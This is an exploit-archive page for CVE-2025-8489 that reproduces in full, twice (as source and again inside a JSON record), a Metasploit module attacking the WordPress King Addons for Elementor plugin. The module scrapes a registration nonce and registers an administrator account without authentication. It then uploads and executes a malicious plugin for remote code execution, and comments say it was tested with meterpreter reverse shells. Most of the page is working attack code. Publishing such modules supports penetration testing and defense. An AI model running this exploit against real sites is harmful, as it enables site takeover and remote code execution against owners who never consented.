📄 WordPress King Addons for Elementor Privilege Escalation / Remote...

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This Metasploit module exploits an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin versions 24.12.92 to 51.1.14. The vulnerability exists in the handleregisterajax function which allows...

Visit Original Source

Basic Information

ID PACKETSTORM:212728

Published Dec 11, 2025 at 00:00

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Payload::Php
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Wordpress

prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE',
'Description' => %q{
This module exploits an unauthenticated privilege escalation vulnerability in the WordPress
King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability exists
in the handle_register_ajax() function which allows unauthenticated attackers to specify
the user_role parameter during registration, enabling them to create administrator accounts.

This exploit requires a WordPress page containing the King Addons "Login Register Form"
Elementor widget, which exposes the required nonce token in the page's JavaScript.
The NONCE_PAGE option must be set to the path of such a page.

Once an administrator account is created, the module uploads and executes a malicious
plugin to achieve remote code execution (RCE).
},
'Author' => [
'Peter Thaleikis', # Vulnerability discovery
'Valentin Lobstein <[email protected]>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-8489'],
['URL', 'https://www.wordfence.com/blog/2025/12/attackers-actively-exploiting-critical-vulnerability-in-king-addons-for-elementor-plugin/']
],
'Platform' => %w[php unix linux win],
'Arch' => [ARCH_PHP, ARCH_CMD],
'DisclosureDate' => '2025-10-30',
'DefaultTarget' => 0,
'Privileged' => false,
'Targets' => [
[
'PHP In-Memory',
{
'Platform' => 'php',
'Arch' => ARCH_PHP
# tested with php/meterpreter/reverse_tcp
}
],
[
'Unix/Linux Command Shell',
{
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command Shell',
{
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options(
[
OptString.new('NONCE_PAGE', [true, 'Path to page containing King Addons Login Register Form widget', '']),
OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),
OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
]
)
end

def check
return CheckCode::Unknown unless wordpress_and_online?

plugin_check = check_plugin_version_from_readme('king-addons', '51.1.35', '24.12.92')
return plugin_check if plugin_check == CheckCode::Safe

@nonce = find_nonce
return CheckCode::Detected('Could not find nonce on specified page') unless @nonce

CheckCode::Appears
end

def exploit
fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?

user_existed = create_admin_user(datastore['USERNAME'], datastore['PASSWORD'], datastore['EMAIL'])

admin_cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
unless admin_cookie
msg = 'Failed to log in to WordPress admin.'
msg += ' User may exist with a different password.' if user_existed
fail_with(Failure::UnexpectedReply, msg)
end

upload_and_execute_payload(admin_cookie)
end

private

def find_nonce
nonce_page = normalize_uri(target_uri.path, datastore['NONCE_PAGE'])
res = send_request_cgi('method' => 'GET', 'uri' => nonce_page)
return nil unless res&.code == 200

doc = res.get_html_document
return nil unless doc

script_nodes = doc.xpath('//script[contains(text(), "king_addons_login_register_vars")]')

script_nodes.each do |script_node|
nonce = extract_nonce_from_script(script_node.text)
return nonce if nonce
end

vprint_warning('Could not find nonce')
nil
end

def extract_nonce_from_script(script_content)
match = script_content.match(/king_addons_login_register_vars\s*=\s*({[^;]+})/)
return nil unless match

json_data = begin
JSON.parse(match[1].gsub('\/', '/'))
rescue StandardError
nil
end
return nil unless json_data.is_a?(Hash)

nonce = json_data['register_nonce']
return nil unless nonce.is_a?(String) && !nonce.empty?

vprint_status("Found nonce: #{nonce}")
nonce
end

def send_registration_request(username:, email:, password:, user_role: 'administrator')
@nonce ||= find_nonce
fail_with(Failure::NotFound, 'Could not find nonce on specified page') unless @nonce

send_request_cgi(
'method' => 'POST',
'uri' => wordpress_url_admin_ajax,
'vars_post' => {
'action' => 'king_addons_user_register',
'nonce' => @nonce,
'username' => username,
'email' => email,
'password' => password,
'confirm_password' => password,
'user_role' => user_role,
'terms_required' => 'no'
}
)
end

def create_admin_user(username, password, email)
res = send_registration_request(username: username, email: email, password: password)
unless res&.code == 200
fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.')
end

json = res.get_json_document
unless json.is_a?(Hash)
fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.')
end

if json['success'] == false && json.dig('data', 'message')&.match?(/already exists|username.*taken|user.*exists/i)
print_warning('User or email already exists, attempting login with provided credentials...')
return true
end

if json['success'] == true
return false
end

fail_with(Failure::UnexpectedReply, "Unexpected response: #{res.body}")
end

def upload_and_execute_payload(admin_cookie)
plugin_name = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}"

zip = generate_plugin(plugin_name, payload_name)
fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)

register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")
register_dir_for_cleanup("../#{plugin_name}")
payload_file = "#{payload_name}.php"
payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)
send_request_cgi('uri' => payload_uri, 'method' => 'GET')
end
end

{
    "lastseen": "2025-12-11T17:24:51",
    "description": "This Metasploit module exploits an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin versions 24.12.92 to 51.1.14. The vulnerability exists in the handleregisterajax function which allows...",
    "published": "2025-12-11T00:00:00",
    "modified": "2025-12-11T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 WordPress King Addons for Elementor Privilege Escalation / Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212728",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-8489"
    ],
    "sourceData": "##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = ExcellentRanking\n    \n      include Msf::Payload::Php\n      include Msf::Exploit::FileDropper\n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Exploit::Remote::HTTP::Wordpress\n    \n      prepend Msf::Exploit::Remote::AutoCheck\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE',\n            'Description' => %q{\n              This module exploits an unauthenticated privilege escalation vulnerability in the WordPress\n              King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability exists\n              in the handle_register_ajax() function which allows unauthenticated attackers to specify\n              the user_role parameter during registration, enabling them to create administrator accounts.\n    \n              This exploit requires a WordPress page containing the King Addons \"Login Register Form\"\n              Elementor widget, which exposes the required nonce token in the page's JavaScript.\n              The NONCE_PAGE option must be set to the path of such a page.\n    \n              Once an administrator account is created, the module uploads and executes a malicious\n              plugin to achieve remote code execution (RCE).\n            },\n            'Author' => [\n              'Peter Thaleikis',                             # Vulnerability discovery\n              'Valentin Lobstein <[email protected]>'     # Metasploit module\n            ],\n            'License' => MSF_LICENSE,\n            'References' => [\n              ['CVE', '2025-8489'],\n              ['URL', 'https://www.wordfence.com/blog/2025/12/attackers-actively-exploiting-critical-vulnerability-in-king-addons-for-elementor-plugin/']\n            ],\n            'Platform' => %w[php unix linux win],\n            'Arch' => [ARCH_PHP, ARCH_CMD],\n            'DisclosureDate' => '2025-10-30',\n            'DefaultTarget' => 0,\n            'Privileged' => false,\n            'Targets' => [\n              [\n                'PHP In-Memory',\n                {\n                  'Platform' => 'php',\n                  'Arch' => ARCH_PHP\n                  # tested with php/meterpreter/reverse_tcp\n                }\n              ],\n              [\n                'Unix/Linux Command Shell',\n                {\n                  'Platform' => %w[unix linux],\n                  'Arch' => ARCH_CMD\n                  # tested with cmd/linux/http/x64/meterpreter/reverse_tcp\n                }\n              ],\n              [\n                'Windows Command Shell',\n                {\n                  'Platform' => 'win',\n                  'Arch' => ARCH_CMD\n                  # tested with cmd/windows/http/x64/meterpreter/reverse_tcp\n                }\n              ]\n            ],\n            'Notes' => {\n              'Stability' => [CRASH_SAFE],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n            }\n          )\n        )\n    \n        register_options(\n          [\n            OptString.new('NONCE_PAGE', [true, 'Path to page containing King Addons Login Register Form widget', '']),\n            OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),\n            OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),\n            OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])\n          ]\n        )\n      end\n    \n      def check\n        return CheckCode::Unknown unless wordpress_and_online?\n    \n        plugin_check = check_plugin_version_from_readme('king-addons', '51.1.35', '24.12.92')\n        return plugin_check if plugin_check == CheckCode::Safe\n    \n        @nonce = find_nonce\n        return CheckCode::Detected('Could not find nonce on specified page') unless @nonce\n    \n        CheckCode::Appears\n      end\n    \n      def exploit\n        fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?\n    \n        user_existed = create_admin_user(datastore['USERNAME'], datastore['PASSWORD'], datastore['EMAIL'])\n    \n        admin_cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])\n        unless admin_cookie\n          msg = 'Failed to log in to WordPress admin.'\n          msg += ' User may exist with a different password.' if user_existed\n          fail_with(Failure::UnexpectedReply, msg)\n        end\n    \n        upload_and_execute_payload(admin_cookie)\n      end\n    \n      private\n    \n      def find_nonce\n        nonce_page = normalize_uri(target_uri.path, datastore['NONCE_PAGE'])\n        res = send_request_cgi('method' => 'GET', 'uri' => nonce_page)\n        return nil unless res&.code == 200\n    \n        doc = res.get_html_document\n        return nil unless doc\n    \n        script_nodes = doc.xpath('//script[contains(text(), \"king_addons_login_register_vars\")]')\n    \n        script_nodes.each do |script_node|\n          nonce = extract_nonce_from_script(script_node.text)\n          return nonce if nonce\n        end\n    \n        vprint_warning('Could not find nonce')\n        nil\n      end\n    \n      def extract_nonce_from_script(script_content)\n        match = script_content.match(/king_addons_login_register_vars\\s*=\\s*({[^;]+})/)\n        return nil unless match\n    \n        json_data = begin\n          JSON.parse(match[1].gsub('\\/', '/'))\n        rescue StandardError\n          nil\n        end\n        return nil unless json_data.is_a?(Hash)\n    \n        nonce = json_data['register_nonce']\n        return nil unless nonce.is_a?(String) && !nonce.empty?\n    \n        vprint_status(\"Found nonce: #{nonce}\")\n        nonce\n      end\n    \n      def send_registration_request(username:, email:, password:, user_role: 'administrator')\n        @nonce ||= find_nonce\n        fail_with(Failure::NotFound, 'Could not find nonce on specified page') unless @nonce\n    \n        send_request_cgi(\n          'method' => 'POST',\n          'uri' => wordpress_url_admin_ajax,\n          'vars_post' => {\n            'action' => 'king_addons_user_register',\n            'nonce' => @nonce,\n            'username' => username,\n            'email' => email,\n            'password' => password,\n            'confirm_password' => password,\n            'user_role' => user_role,\n            'terms_required' => 'no'\n          }\n        )\n      end\n    \n      def create_admin_user(username, password, email)\n        res = send_registration_request(username: username, email: email, password: password)\n        unless res&.code == 200\n          fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.')\n        end\n    \n        json = res.get_json_document\n        unless json.is_a?(Hash)\n          fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.')\n        end\n    \n        if json['success'] == false && json.dig('data', 'message')&.match?(/already exists|username.*taken|user.*exists/i)\n          print_warning('User or email already exists, attempting login with provided credentials...')\n          return true\n        end\n    \n        if json['success'] == true\n          return false\n        end\n    \n        fail_with(Failure::UnexpectedReply, \"Unexpected response: #{res.body}\")\n      end\n    \n      def upload_and_execute_payload(admin_cookie)\n        plugin_name = \"wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}\"\n        payload_name = \"ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}\"\n    \n        zip = generate_plugin(plugin_name, payload_name)\n        fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)\n    \n        register_files_for_cleanup(\"#{payload_name}.php\", \"#{plugin_name}.php\")\n        register_dir_for_cleanup(\"../#{plugin_name}\")\n        payload_file = \"#{payload_name}.php\"\n        payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)\n        send_request_cgi('uri' => payload_uri, 'method' => 'GET')\n      end\n    end",
    "sourceHref": "https://packetstorm.news/download/212728",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212728/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 WordPress King Addons for Elementor Privilege Escalation / Remote Code Execution_PACKETSTORM:212728

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply